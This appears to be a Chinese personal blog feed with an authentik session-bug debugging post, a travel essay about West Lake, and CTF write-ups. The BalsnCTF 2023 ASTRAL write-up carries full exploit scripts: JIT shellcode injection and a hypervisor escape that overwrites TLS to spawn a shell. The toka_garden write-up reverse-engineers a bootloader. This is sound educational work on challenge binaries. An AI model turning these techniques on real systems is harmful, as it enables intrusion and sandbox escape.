在初步的调研中我们初步确定keycloakauthentik比较满足我们的需求。但是我们的需求中有一点:Outline不支持外部的权限管理,只支持外部的认证服务,而我们不希望允许任何未授权的用户访问Outline服务,这意味这我们必须在认证(authentication)步骤加入鉴权。而keycloak在这方面有着严重的问题,意味着我们必须ban掉一切第三方身份认证服务。因此我们只能选择authentik。

我们同时允许用户在authentik注册本地的账号,和通过微软等第三方idp进行账号注册和登录。

起因

在服务部署后,我们发现用户在使用第三方idp登录时会遇到偶发的认证失败问题,报错Flow does not apply to current user,并且难以复现

而日志并没有提供太多有效的信息,导致我们难以定位问题所在,暂且考虑是哪里发生了竞争导致

问题定位

根据配置时的经验,Flow does not apply to current user应该是因为有用户进入了一个flow,但是却被flow绑定的policy判断没有权限进入flow而产生的报错提示。由此我们定位到了default-source-authentication flow的default-source-authentication-if-sso policy

这个policy只是简单地判断用户是否来自外部idp,应该没有理由对正常认证流程的用户执行失败,由此我们考虑问题可能出在这里。我们打开了这个policy的记录执行日志选项,查看发生错误时的context,然后有了意外收获

这里是一个发生问题的日志,红笔涂抹处为用户名。我们可以看到用户最初登录时匿名用户,此时policy结果为true,然后登录成功,然而马上又发生了一次policy执行结果为false,且此时的用户为匿名用户。此时用户已经正常登录成功了才对,怎么可能为匿名用户呢?

在客户端复现问题后,我们查看了相关的网络日志

用户在请求认证相关endpoint时,几乎同时请求了/api/v3/core/brands/current//api/v3/root/config两个endpoint,用户带着session请求,然而后端竟然返回了Set-Cookie: authentik_session="",导致虽然认证endpoint返回了已认证的session,但此时浏览器端的session却被清空,再次请求认证endpoint时仍为未登录状态。

此时用户不是从外部idp返回,所以导致了policy执行失败。但是后端怎么会清空session呢?

我们查看了authentik的源码,发现只有一处可能导致返回这样的Set-Cookie头,即SessionMiddlewareprocess_response处调用了delete_cookie方法

这也就意味着用户的session在实际的SessionStore中实际不存在。但考虑到它曾经还是合法的,只有一种可能:用户的Session被作废了

authentik的用户登录使用的是django.contrib.auth的login,而阅读源码我们发现在认证成功后,会产生一个新的session_key,而作废掉原先的session_key

因此,用户带着旧的session请求额外两个endpoint时,实际上此时用户已经登录成功了,只是新的session还没有响应给浏览器。因此中间件查找不到用户请求时带有的旧session,便调用delete_cookie清空了用户的session,导致了上述的情况。

workaround

我们提出了issue,然而还未得到维护者的响应。我们暂时过滤掉了两个额外endpoint响应时的Set-Cookie头,问题得到了解决。

]]> 这authentik能配下去一秒的都是神人了 夜彳亍西湖 https://zqy.ink/2024/03/30/westlake/ 2024-03-30T18:31:16.000Z 2025-11-14T08:20:36.883Z 西湖的夜景称得上好看,但并不如我想象中的惊艳——也许是我的审美还不够的原因吧。不过想想也合理,一潭映射着周围纷杂灯光的湖水,和一片被都市的灯火照得通明的天空,实在算不上什么出色的搭配。

但也许正因如此,我能将焦点放在这里形形色色的人身上。绕着西湖慢慢游览,尽管已是晚上十点,湖畔仍是人群熙攘。有深情弹唱的人,有放声清唱的人,有围在一旁默默欣赏表演的人,也有情不自禁跟着哼唱的人。好像在这里,人们不再踌躇,而是近乎放肆地表达自己的情感,让它们填满空荡荡的湖面,也在每名听众的心中不断回响。

除此之外,还有带货的主播、约会的情侣、好看的coser,以及像我这样匆匆经过的旅客……我们以各不相同的节奏生活,却在此时此刻,共同栖居在潮湿的气息里、在一阵轻柔的水声旁,形成了某种共鸣。我们因为不同的原因来到西湖,在静谧的湖水中寻找内心的安宁。

走在白堤上,昏暗而望不到尽头的路,像是在诱使我陷入其中——而我欣然地接受了。有时感觉路就是这样,在一片黑暗中摸索前行,不知道下一秒迎接自己的是什么。我也有过不少踌躇满志的时候,感觉能好好地把这段路走完,然后又迅速地幻灭于某个情绪崩溃的晚上。但我现在已经可以不用畏惧前行,因为有路旁树枝上盛开的花,有身边非常善良的朋友,有湖水上倒映的温馨的人间烟火。希望终有一天我能学会如何喜欢这条路,和志同道合的朋友们一起走下去。

大概是背着包负重前行的结果,走到路的尽头,脚部的关节已然吱吱作响。摊在归去的计程车上,我想我已经在这里走完了一段人生。

]]> 夜彳亍西湖 BalsnCTF2023Pwn ASTRAL赛题复现 https://zqy.ink/2023/10/23/astral/ 2023-10-23T16:04:28.000Z 2025-11-14T08:20:36.875Z 题目链接https://github.com/jwang-a/CTF/tree/master/MyChallenges/Pwn/ASTRAL/

赛题分析

题目给出了5个文件夹:

  • APPLET(赛题设计初期对applet的设计和简单的python实现)
  • APPLET_PROCESSOR(赛题对applet运行时的C语言实现,以device形式连接hypervisor)
  • HYPERVISOR(使用kvm实现vm,支持连接device)
  • KERNEL(一个单进程的操作系统内核)
  • USER(在内核中运行的用户态程序)

所以结构是:

1
2
3
4
5
DEVICE

  |  pipe     hypercall           syscall

HYPERVISOR  ------------- KERNEL------------USER

Nebula(Stage1, Custom vm)

本题作为Stage1,只是考察有没有理解代码。通过HYPERVISOR/const.h我们能知道每关flag对应的位置。搜索得printflag调用链

kernelMain()→initAppletStorage()→g_applet.applets[APPLET_CNT_MAX + 3].nativeFn = appletBuiltinFlag→hp_appletspaceFlag()→hypercall(HP_APPLETSPACE_FLAG, 9)→hp_appletspaceFlag(vm)→printFlag(APPLETSPACE_FLAG_FNAME)

即我们通过invoke位置在APPLET_CNT_MAX+3的applet即可。然而,若是通过kernel syscall直接invoke会失败,原因是在KERNEL/applet.c:kAppletInvoke处存在检查if (appletIdx >= APPLET_CNT_MAX && caller == TASK_NIL) return FAIL;若想invoke,必须满足caller!=TASK_NIL,即必须由另一个applet调用

注意到applet自身即可调用其他applet(操作码invoke)。运行至invoke时,processor会保存上下文,给hypervisor发送中断(APPLET_PROCESSOR/processor.c:handleAppletExit),而中断会被传递至kernel的interruptEntry中(HYPERVISOR/interrupt.c:runInterruptHandler)被kAppletInterupt处理。通过kAppletInvoke调用其他applet,此时的caller就不为TASK_NIL了。

然而,无论是register还是invoke一个applet都需要有合法的RSA签名(APPLET_PROCESSOR/processor.c:appletCheckSignature),我们自己写的applet自然是不会被加载和调用的。好在题目已经给出了两个签名后的applet(APPLET/escrow, APPLET/lottery),通过分析escrow,我们发现完全可以通过它调用其他的applet。第一次调用escrow初始化存储,第二次提供id就可以调用对应的applet。需要注意的是,第一次调用时将输入的8字节存储为preimage,第二次会将传入的前8字节取digest与preimage进行比较,只有比较成功才会按之后的8字节id调用对应的applet。

为了获得对应的id,我们可以自行实现digestGenerate

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include<stdint.h>
#include <openssl/sha.h>

#define SUCCESS 0
#define FAIL 0xffffffffffffffff

#define DIGEST_PAYLOAD_SIZE_MAX     0x2000
#define DIGEST_SIZE                 0x20
#define SIGNATURE_SIZE              0x100

uint64_t digestGenerateHelper(uint64_t codeLen, uint8_t *code, uint8_t *n, uint8_t *e, uint8_t *nonce, uint8_t *digest) {
  uint8_t payload[DIGEST_PAYLOAD_SIZE_MAX];
  if (n != NULL) {
    memcpy((uint64_t)payload, (uint64_t)n, SIGNATURE_SIZE);
  } else {
    memset((uint64_t)payload, '\0', SIGNATURE_SIZE);
  }
  if (e != NULL) {
    memcpy((uint64_t)&payload[SIGNATURE_SIZE], (uint64_t)e, SIGNATURE_SIZE);
  } else {
    memset((uint64_t)&payload[SIGNATURE_SIZE], '\0', SIGNATURE_SIZE);
  }
  if (nonce != NULL) {
    memcpy((uint64_t)&payload[SIGNATURE_SIZE * 2], (uint64_t)nonce, SIGNATURE_SIZE);
  } else {
    memset((uint64_t)&payload[SIGNATURE_SIZE * 2], '\0', SIGNATURE_SIZE);
  }
  memcpy((uint64_t)&payload[SIGNATURE_SIZE * 3], (uint64_t)code, codeLen);
  SHA256(SIGNATURE_SIZE * 3 + codeLen, payload, digest);
  return SUCCESS;
}

也可以直接hack进kernel(KERNEL/applet.c:initAppletStorage line26-28),取输出即可

1
2
3
uint64_t buf;
getPhysAddr((uint64_t)appletDigest, PDE64_RW, &buf);
hp_write(1, buf, 8);

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import *
from typing import Optional
from hashlib import sha256

context.log_level='debug'
p=process(['./hypervisor','./processor','./kernel','./user','1500'])
menu=b'leave'
def sendNum(x: int):
    p.sendline(str(x).encode())

def login(username: bytes, password: bytes, usernameLen: Optional[int] = None, passwordLen = None):
    if usernameLen==None:
        usernameLen=len(username)
    if passwordLen==None:
        passwordLen=len(password)
    sendNum(usernameLen)
    sendNum(passwordLen)
    p.send(username)
    p.send(password)

def registerApplet(code: str, signature: str, codeLen: Optional[int] = None, nonce: str = '00'*0x100, pubn: str = '00'*0x100, pube:str = '00'*0x100) -> int:
    assert(len(code)%2==0)
    if codeLen == None:
        codeLen=len(code)//2
    sendNum(1)
    sendNum(codeLen)
    p.send(code.encode())
    p.send(nonce.encode())
    p.send(pubn.encode())
    p.send(pube.encode())
    p.send(signature.encode())
    p.recvuntil(b': ')
    return int(p.recvuntil(b'\n').decode())

def invokeApplet(appid: int, data: str, dataLen: Optional[int] = None) -> int:
    assert(len(data)%2==0)
    if dataLen == None:
        dataLen=len(data)//2
    sendNum(3)
    sendNum(appid)
    sendNum(dataLen)
    p.send(data.encode())
    p.recvuntil(b': ')
    return int(p.recvuntil(b'\n').decode())

login(b'a', b'a')
p.recvuntil(menu)
id=registerApplet('4003004119003400000000000120023001015a21440400400a00fd401c00fd56005611ff3002085a2b42f3ff27995a8944ecff281050102f90fd400100fd3009105a9b42d9ff5010590a300208278950202f90300302513e59e33700633193a9d18f5ea530011059a2fe203130000850022f825a8144a7ff51022f92270030021059b15121fefd', '2fd4be9be84da8a203cfa80f008fe7a4b14a654d504a67f90c898da101a1527a8f8d43e1dd4eb4f0465deaf030ca2f723b269d959bfb47905f8c169d1028a5f41197b4b51c48bb85e578ea66b6bfd6e2b10d0c8b151fa8774fe91f56e9ad5ff5bff9fa5af6b0e52c08ea014b6b55115918d2d60860464d865fe2c521503fb2a4ed3a551d9c27d933d3de1d183de0e2d085166c9815843546bf6a3698a02a107ca57b6f7d329e1a3e9496ad7f1c69e069cd84947d98b241f5226db74eb018494945c21420ad2cfbfb4b2c0f586f7820794eedf2df8e7527d98873535c5d05ffb8df44c4f8b5cf3dc34515806ee7aa85cba75e1872a340435efffb13a6a395a812', nonce='2fd4be9be84da8a203cfa80f008fe7a4b14a654d504a67f90c898da101a1527a8f8d43e1dd4eb4f0465deaf030ca2f723b269d959bfb47905f8c169d1028a5f41197b4b51c48bb85e578ea66b6bfd6e2b10d0c8b151fa8774fe91f56e9ad5ff5bff9fa5af6b0e52c08ea014b6b55115918d2d60860464d865fe2c521503fb2a4ed3a551d9c27d933d3de1d183de0e2d085166c9815843546bf6a3698a02a107ca57b6f7d329e1a3e9496ad7f1c69e069cd84947d98b241f5226db74eb018494945c21420ad2cfbfb4b2c0f586f7820794eedf2df8e7527d98873535c5d05ffb8df44c4f8b5cf3dc34515806ee7aa85cba75e1872a340435efffb13a6a395a812')
nonce=sha256(bytes.fromhex('deadbeefdeadbeef')).hexdigest()[:16]
invokeApplet(id, nonce)
invokeApplet(id, 'deadbeefdeadbeef'+'25663ff71c330069')
context.log_level='INFO'
p.interactive()

Protostar(Stage2, JIT)

根据上文对const.h的分析和flag引用查找可知,本题需要我们控制device向hypervisor发送特定的interrupt得到flag。

漏洞点在于JIT对mov reg, [reg]的实现有误:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
//APPLET_PROCESSOR/jit.h

#define MEM_LOAD(_APPLET_CONTEXT, _PC, _REG1, _REG2, _SIZE) { \
  uint64_t MLO_asmByte; \
  MEM_TRANSLATE(_APPLET_CONTEXT, _PC, _REG2, _SIZE); \
  MLO_asmByte = 0x008b48 | (((_REG1) & 8) >> 1) | (((_REG1) & 7) << 19) | (((_REG2) & 8) >> 3) | (((_REG2) & 7) << 16); \
  EMIT(_APPLET_CONTEXT, &MLO_asmByte, 3);                     /* mov reg1, [reg2] */ \
  if ((_SIZE) != 8) { \
    MLO_asmByte = 0x00e0c148 | (((8 - (_SIZE)) * 8) << 24) | (((_REG1) & 8) >> 3) | (((_REG1) & 7) << 16); \
    EMIT(_APPLET_CONTEXT, &MLO_asmByte, 4);                   /* shl reg1, ((8 - size) * 8) */ \
    MLO_asmByte = 0x00e8c148 | (((8 - (_SIZE)) * 8) << 24) | (((_REG1) & 8) >> 3) | (((_REG1) & 7) << 16); \
    EMIT(_APPLET_CONTEXT, &MLO_asmByte, 4);                   /* shr reg1, ((8 - size) * 8) */ \
  } \
  if ((_REG1) == (_REG2)) { \
    EMIT(_APPLET_CONTEXT, "\x48\x83\xc4\x08", 4);             /* add rsp, 8 */ \
  } else { \
    HOST_POP_REG(_APPLET_CONTEXT, _REG2);                     /* pop reg2 */ \
  } \
}

此处使用的mov指令为mov r64, r/m64,指令格式为REX.W + 8B /r,题目通过更改REX.BModRM:r/m来编码第二个操作数,然而当第二个操作数为r12r13时,编码格式稍有变化

r12对应的R/M为100,r13对应的R/M为101,显然在Mod为00时(即操作数为寄存器且无偏移时)他们不能被直接塞入R/M中,取而代之应该结合REX,对于r12使用SIB byte,对于r13增加00偏移来表示

感觉mod?11是intel文档乱码了

而题目没有考虑到这种情况,错误地进行了编码,例如mov rax, [r13]被编码为49 8b 05。我们看到在Table 2-2中,并没有给出对应的寄存器。那么这对应的指令是什么呢?

通过翻阅手册我们得知,49 8b 05 XX XX XX XX对应的是mov rax, [rip+{int32}],即RIP相对寻址。因为指令长度的不同,这里JIT的错误编码给了我们构造指令错位的机会。构造时要注意寻址到合法的地址,通过调试得知需要int32为一个较小的正数(小于0x26b5f4d)。

回到漏洞点,我们发现在49 8b 05后还有HOST_POP_REG(_APPLET_CONTEXT, _REG2),即pop r13,即占用了两个字节。接下来我们翻jit.h找一个比较小的指令,发现add很符合需求(_OP==1)

1
2
3
4
5
// op reg1, reg2
#define REG_OPS(_APPLET_CONTEXT, _OP, _REG1, _REG2) { \
  uint64_t RPS_asmByte = 0xc00048 | ((_OP) << 8) | (((_REG1) & 8) >> 3) | (((_REG1) & 7) << 16) | (((_REG2) & 8) >> 1) | (((_REG2) & 7) << 19); \
  EMIT(_APPLET_CONTEXT, &RPS_asmByte, 3); \
}

并且我们惊喜地发现,通过控制_REG2=0b101(RBP/R13), REG1=0b011(RBX/R11)即可在第三个字节构造出0xeb,即jmp rel8指令的opcode。考虑到我们只能使用r0-r15,可以选择add r3, r13add r11, r13。接下来我们构造rel8,实际上直接使用REX(0x48)即可,我们可以直接使用load reg, imm64作padding,并使用其中的imm64放置shellcode,在两段imm64间使用jmp $+2衔接。

最终exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
from pwn import *
from typing import Optional
from assembler import aasm

context.log_level='debug'
p=process(['./hypervisor','./processor','./kernel','./user','100000'])
menu=b'leave'
def sendNum(x: int):
    p.sendline(str(x).encode())

def login(username: bytes, password: bytes, usernameLen: Optional[int] = None, passwordLen = None):
    if usernameLen==None:
        usernameLen=len(username)
    if passwordLen==None:
        passwordLen=len(password)
    sendNum(usernameLen)
    sendNum(passwordLen)
    p.send(username)
    p.send(password)

def registerApplet(code: str, signature: str = '00'*0x100, codeLen: Optional[int] = None, nonce: str = '00'*0x100, pubn: str = '00'*0x100, pube:str = '00'*0x100) -> int:
    assert(len(code)%2==0)
    if codeLen == None:
        codeLen=len(code)//2
    sendNum(1)
    sendNum(codeLen)
    p.send(code.encode())
    p.send(nonce.encode())
    p.send(pubn.encode())
    p.send(pube.encode())
    p.send(signature.encode())
    p.recvuntil(b': ')
    return int(p.recvuntil(b'\n').decode())

def invokeApplet(appid: int, data: str = '', dataLen: Optional[int] = None) -> int:
    assert(len(data)%2==0)
    if dataLen == None:
        dataLen=len(data)//2
    sendNum(3)
    sendNum(appid)
    sendNum(dataLen)
    p.send(data.encode())
    p.recvuntil(b': ')
    return int(p.recvuntil(b'\n').decode())


login(b'a', b'a')
p.recvuntil(menu)

code='''
load <8> r0, [r13]
add r11, r13
load <8> r0, 0
load <8> r0, 0
load <8> r0, 0
load <8> r0, 0
load <8> r0, 0
load <8> r0, 0
load <8> r0, 0
load <8> r0, 0x02eb00000102bf90  // nop; mov edi, 0x102; jmp 2
load <8> r0, 0x02eb54000000f368  // push 0xf3; push rsp; jmp 2
load <8> r0, 0x02eb500104c0315e  // pop rsi; xor eax, eax; add al, 1; push rax; jmp 2
load <8> r0, 0x050f3cb0050f5a    // pop rdx; syscall; mov al, 0x3c; syscall
'''
code=aasm(code)

appid=registerApplet(code.hex())
invokeApplet(appid)

p.interactive()

Redgiant(Stage3, Userspace)

还在看

Supernova(Stage4, Kernel)

还在看

Neutron(Stage5, Hypervisor)

攻击hypervisor,最先想到的就是对内存的读写操作没有进行完好的边界检查。注意到以下代码(HYPERVISOR/hypercall.c)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#define MEM_SIZE 0x4000000
#define PAGE_SIZE 0x1000

uint64_t getMem(VM *vm, uint32_t paddr, uint32_t size, void *dst) {
  if (paddr >= MEM_SIZE) return FAIL;
  memcpy(dst, &(((char*)vm->mem)[paddr]), size);
  return SUCCESS;
}

uint64_t setMem(VM *vm, uint32_t paddr, uint32_t size, void *src) {
  if (paddr >= MEM_SIZE) return FAIL;
  memcpy(&(((char*)vm->mem)[paddr]), src, size);
  return SUCCESS;
}

uint32_t hp_read(VM *vm) {
  HYPER_READ readArg;
  char buf[PAGE_SIZE];
  if (getHpArg(vm, sizeof(HYPER_READ), &readArg) == FAIL) return HP_FAIL;
  if (readArg.fd != STDIN_FILENO) return HP_FAIL;
  if (readArg.size > PAGE_SIZE) return HP_FAIL;
  for (uint64_t cursor = 0, readSize = 0; cursor < readArg.size; cursor += readSize) {
    if ((readSize = read(readArg.fd, &buf[cursor], readArg.size - cursor)) <= 0) return HP_FAIL;
  }
  if (setMem(vm, readArg.paddr, readArg.size, buf) == FAIL) return HP_FAIL;
  return HP_SUCCESS;
}

uint32_t hp_write(VM *vm) {
  HYPER_WRITE writeArg;
  char buf[PAGE_SIZE];
  if (getHpArg(vm, sizeof(HYPER_WRITE), &writeArg) == FAIL) return HP_FAIL;
  if (writeArg.fd != STDOUT_FILENO) return HP_FAIL;
  if (writeArg.size > PAGE_SIZE) return HP_FAIL;
  if (getMem(vm, writeArg.paddr, writeArg.size, buf) == FAIL) return HP_FAIL;
  if (write(writeArg.fd, buf, writeArg.size) != writeArg.size) return HP_FAIL;
  return HP_SUCCESS;
}

仅对paddr进行了越界检查,而没有检查paddr+size是否越界。这导致我们可以实现hypervisor内存vm.mem后0xfff大小的任意读写。根据调试可以得知,这个位置刚好是TLS的部分。先通过读得到libc_base

我们可以通过修改fs_base附近的内容,使read认为自己处在一个被cancel的线程中,从而执行exception handler。

调用链__GI__libc_read → __GI__pthread_enable_asynccancel → __do_cancel → __GI___pthread_unwind → _Unwind_ForcedUnwind(glibc) → link → _Unwind_ForcedUnwind(libgcc) → …(调不明白了) → __libc_longjmp → __longjmp_cancel

因为link时的指针都被mangle过(左移0x11异或fs:[0x30]),所以我们可以先把fs:[0x30]改为0

为了满足pthread_enable_asynccancel的条件,需要把fs:[0x18]设为1,fs:[0x308]设为8

通过修改fs:[0x300]处的结构体指针,我们可以控制执行exception handler时的寄存器,包括r8, r9, rdx(rip), rbx, r12, r13, r14, r15, rbp, rsp。通过调试可知此时r10也为0,所以我们可以直接使用one_gadget得到shell。如果没有合适的one_gadget,也可以通过ROP getshell(因为rsp可控)

具体偏移如下(rdi为fs:[0x300]处的结构体指针):

进行hypercall时,eax使用任意空闲内存地址即可,我使用了kernel的栈顶部分

对于processor,使用jmp $-2似乎会导致hypervisor接收中断失败从而崩溃,因此我选择使其陷入IO中

最终exp:(作者给出的官方exp似乎打不通,小坑)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from pwn import *
from pwn import u64,p32,p64
context(arch='amd64',log_level='debug',terminal=['tmux','splitw','-h'])
p=process(['./hypervisor','./processor','./kernel','./user','3'])
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)

def rol(val, cnt):
    return ((val << cnt) | (val >> (64 - cnt))) & ((1 << 64) - 1)

sc1=asm('''
label_1:
    mov edi,0x100
    lea rsi,[rip+0x20]
    mov edx,0x100
    xor eax,eax
    syscall
    jmp label_1
''')

sc2=asm('''
mov dx,0x8001 
mov eax,0x5c000
mov qword ptr [rax],1
mov qword ptr [rax+8],0x3ffffff
mov qword ptr [rax+0x10],0x1000
out dx, eax

mov dx,0x8000
mov eax,0x5c000
mov qword ptr [rax],0
mov qword ptr [rax+8],0x3ffffff
mov qword ptr [rax+0x10],0x1000
out dx, eax

mov dx,0x8000
mov eax,0x5c000
mov qword ptr [rax],0
mov qword ptr [rax+8],0x3ffffff
mov qword ptr [rax+0x10],0x1000
out dx, eax
''').ljust(0x1000,b'\xcc')

p.sendlineafter(b'length : ',str(len(sc1)).encode())
p.sendafter(b'shellcode : ',sc1)
p.send(sc2)
data=b''
while len(data)<0x1000:
    data+=p.recv(0x1000-len(data))
fs_base=u64(data[0x741:0x749])
tls_base=fs_base-0x740
success('fs_base='+hex(fs_base))
libc.address=fs_base-0x740+0x3000
success('libc_base='+hex(libc.address))

target=libc.address+0xebc81 #one_gadget

data=data[:0x741+0x18]+p32(1)+data[0x741+0x18+4:] #pthread_cancel
data=data[:0x741+0x300]+p64(tls_base)+p32(8)+data[0x741+0x308+4:] #setjmp context
data=data[:0x741+0x30]+p64(0)+data[0x741+0x38:] #fs:[0x30]
data=data[:9]+p64(rol(tls_base-0x1000,0x11))+data[0x11:] #rbp
data=data[:0x31]+p64(rol(tls_base,0x11))+p64(rol(target,0x11))+data[0x41:] #rsp rdx(rip)

pause()
p.send(data)

p.interactive()

StarryNight(Fullchain)

还在看

]]> 又是被高手题折磨到养胃的一天 toka_garden赛题复现 https://zqy.ink/2023/08/15/toka_garden/ 2023-08-15T10:06:16.000Z 2025-11-14T08:20:36.883Z 前言

本文与giacomo共同撰写。

文件分析

题目给了一个硬盘的二进制文件,通过第一扇区结尾的0x55 0xAA可以判断出这就是MBR扇区。硬盘一共包含6个扇区。BIOS会将MBR扇区加载至0x7c00位置运行,直接拖入IDA,rebase后静态分析。若要动态分析,则需要一些小技巧。

如果用gdb连接qemu从一开始调试,明显不对劲,这是因为此时系统正在实模式下运行,而gdb反汇编指令则是按64位指令反汇编,所以识别错了指令。若用set architecture i8086,则会导致调试客户端与服务端的不匹配,也不能正常调试。在实模式下,使用bochs调试会是一个不错的方案。而在进入64位模式后,bochs作为x86 emulator就不能继续调试,此时qemu可以调试。所以可以gdb连接qemu后下断点到进入64位模式的位置,就能正常调试了。

bootloader

其实这里有源码,不过出于学习目的,我们还是逆向分析一下

实模式

首先,程序将硬盘中的内容加载进内存

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
sub_7C00 proc near
xor     bx, bx
mov     ds, bx
mov     ss, bx
mov     bp, 7C0h
mov     dh, 0
mov     cx, 1
loc_7C0E:
add     cl, 1
jb      short loc_7C1F
add     bp, 20h
mov     es, bp
mov     ax, 201h
int     13h             ; DISK - READ SECTORS INTO MEMORY
                        ; AL = number of sectors to read, CH = track, CL = sector
                        ; DH = head, DL = drive, ES:BX -> buffer to fill
                        ; Return: CF set on error, AH = status, AL = number of sectors read
jnb     short loc_7C0E

因为第一扇区是MBR扇区,已经被BIOS加载进0x7c00,所以程序从第二扇区开始加载进0x7e00处,直到读取失败,CF=1,在int 13h后不再继续向上跳转,而是向下执行。

1
2
3
4
5
loc_7C1F:
mov     di, 800h
xor     al, al
lea     cx, ds:7400h
rep stosb byte ptr es:[di], al

注意到es段寄存器的位置在于内存上加载的内存数据的结尾,di为0x800的偏移,即从0x9000处开始清零长度为0x7400的内存

1
2
cli
lgdt    fword ptr ds:unk_7CAB

加载GDT,具体的段描述符内容我们可以在bochs中使用info gdt查看

1
2
3
Global Descriptor Table (base=0x0000000000007ca9, limit=15):
GDT[0x0000]=Code segment, base=0x00a9000f, limit=0x0000c3a4, Execute-Only, Conforming, 16-bit
GDT[0x0008]=Code segment, base=0x00000000, limit=0x00000fff, Execute/Read, Non-Conforming, 64-bit

gdt在index为0处的描述符被定义为空描述符,所以我们可以不必在意其中GDT[0]的内容,只需要看GDT[8]处定义了一个基址为0的64位代码段。

1
2
3
4
5
6
7
8
mov     eax, 1000h
mov     word ptr [eax], 2003h
mov     word ptr ds:1FF8h, 2003h
mov     cr3, eax
mov     word ptr ds:2000h, 3003h
mov     word ptr ds:2008h, 4003h
mov     word ptr ds:2FF0h, 3003h
mov     word ptr ds:2FF8h, 4003h

页表相关

1
2
3
4
5
6
7
8
9
10
mov     di, 3000h
xor     ax, ax
mov     cx, 400h
loc_7C64:
mov     byte ptr [di], 83h
mov     [di+3], ax
add     di, 8
inc     ax
inc     ax
loop    loc_7C64

页表相关

1
2
3
mov     eax, cr4
or      al, 10100011b ; PGE PAE PVI VME
mov     cr4, eax

启用分页(当然因为此时还在实模式,分页只是被设置启用,而并没有生效。需要进入保护模式后才会生效)

1
2
3
4
mov     ecx, 0C0000080h ; IA32_EFER
rdmsr
or      ax, 100000000b ; LME
wrmsr

设置IA32_EFER寄存器的LME位为1,从而启用四层页表,为接下来进入IA-32e mode做准备

1
2
3
mov     eax, 80000011h ; PG ET PE
mov     cr0, eax
jmp     far ptr 8:7C94h

在执行mov cr0, eax时,因为IA32_EFER.LME==1,设置CR0.PG=1会使IA32_EFER.LMA=1,此时IA-32e mode启用(详见Intel开发者手册Volume 3 10.8.5)。然后通过far jmp设置cs为8,从0x7c94开始执行64位指令。

等等,我们前面的GDT[8]的limit分明是0xfff,这样不是访问越界了吗?

–并不是这样,在IA-32e mode下,段机制的作用很有限,并且处理器不再进行越界检查(详见Intel开发者手册Volume 3 3.2.4)

我看书上写进保护模式还需要开启a20 gate啊?

–新的Intel 64 CPU默认解锁地址线,不需要开启操作。

保护模式

我们前面没有分析页表的内容,这是因为我们现在可以使用pt查看内存页(需要gdb-pt-dump插件),和monitor info tlb查看线性地址到物理地址的映射关系。页表:

1
2
3
4
5
           Address :     Length   Permissions          
               0x0 : 0x80000000 | W:1 X:1 S:1 UC:0 WB:1
      0x7f80000000 : 0x40000000 | W:1 X:1 S:1 UC:0 WB:1
0xffffff8000000000 : 0x80000000 | W:1 X:1 S:1 UC:0 WB:1
0xffffffff80000000 : 0x40000000 | W:1 X:1 S:1 UC:0 WB:1
1
2
3
4
5
6
7
8
mov     esi, 7E00h
mov     rdi, 0FFFFFFFF80200000h
lodsq   rax, qword ptr [rsi]
stosq   qword ptr [rdi], rax
push    rdi
mov     rcx, rax
rep movsb byte ptr [rdi], byte ptr [rsi]
retn

0x7e00处存储了接下来代码的长度,然后将对应长度的数据从0x7e08拷贝至0FFFFFFFF80200008h开始的位置,然后通过retn跳转到对应位置执行,进入系统内核。我们ida rebase一下继续分析

kernel

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
sub_FFFFFFFF80200008 proc near
or      byte ptr ds:1000h, 4
or      byte ptr ds:2000h, 4
mov     edi, 5000h
mov     eax, 8007h
stosq
mov     eax, 9007h
stosq
mov     ecx, 1FEh
mov     eax, 3
loc_FFFFFFFF80200035:
stosq
add     rax, 1000h
loop    loc_FFFFFFFF80200035
mov     dword ptr ds:3000h, 5007h
mov     rax, cr3
mov     cr3, rax

改页表。新页表:

1
2
3
4
5
6
7
8
9
           Address :     Length   Permissions          
               0x0 :     0x2000 | W:1 X:1 S:0 UC:0 WB:1
            0x2000 : 0x7fffe000 | W:1 X:1 S:1 UC:0 WB:1
      0x7f80000000 :     0x2000 | W:1 X:1 S:0 UC:0 WB:1
      0x7f80002000 : 0x3fffe000 | W:1 X:1 S:1 UC:0 WB:1
0xffffff8000000000 :     0x2000 | W:1 X:1 S:0 UC:0 WB:1
0xffffff8000002000 : 0x7fffe000 | W:1 X:1 S:1 UC:0 WB:1
0xffffffff80000000 :     0x2000 | W:1 X:1 S:0 UC:0 WB:1
0xffffffff80002000 : 0x3fffe000 | W:1 X:1 S:1 UC:0 WB:1
1
2
3
4
5
xor     rdi, rdi
mov     ecx, 2000h
xor     al, al
rep stosb byte ptr [rdi], al
lgdt    fword ptr cs:unk_FFFFFFFF80200120

从逻辑地址0处清零0x2000长度的内存。加载新的GDT。分析新的GDT内容可得:

1
2
3
4
5
6
0: 空
8: 64-bit Code Segment, DPL=0, Non-Conforming, Readable
10: 64-bit Data Segment, DPL=0, Writable
18: 64-bit Code Segment, DPL=3, Non-Conforming, Readable
20: 64-bit Data Segment, DPL=3, Writable
28: TSS Descriptor
1
2
3
4
5
6
7
8
9
mov     ax, 10h
mov     ss, eax
mov     ds, eax
mov     fs, eax
mov     es, eax
mov     gs, eax
push    8
push    0FFFFFFFF8020007Ah
retfq

将ss, ds, fs, es, gs设为0x10,cs设为8,继续向下执行

1
lidt    fword ptr cs:unk_FFFFFFFF802007A0

加载IDT,可以点进去直接看,也可以monitor info registers -a看 idtr 是 IDT= ffffffff80200790 00000010

1
2
3
4
5
6
7
8
segment selector: 8 # 中断程序所在的段选择符
offset: 0xffffffff8020012a
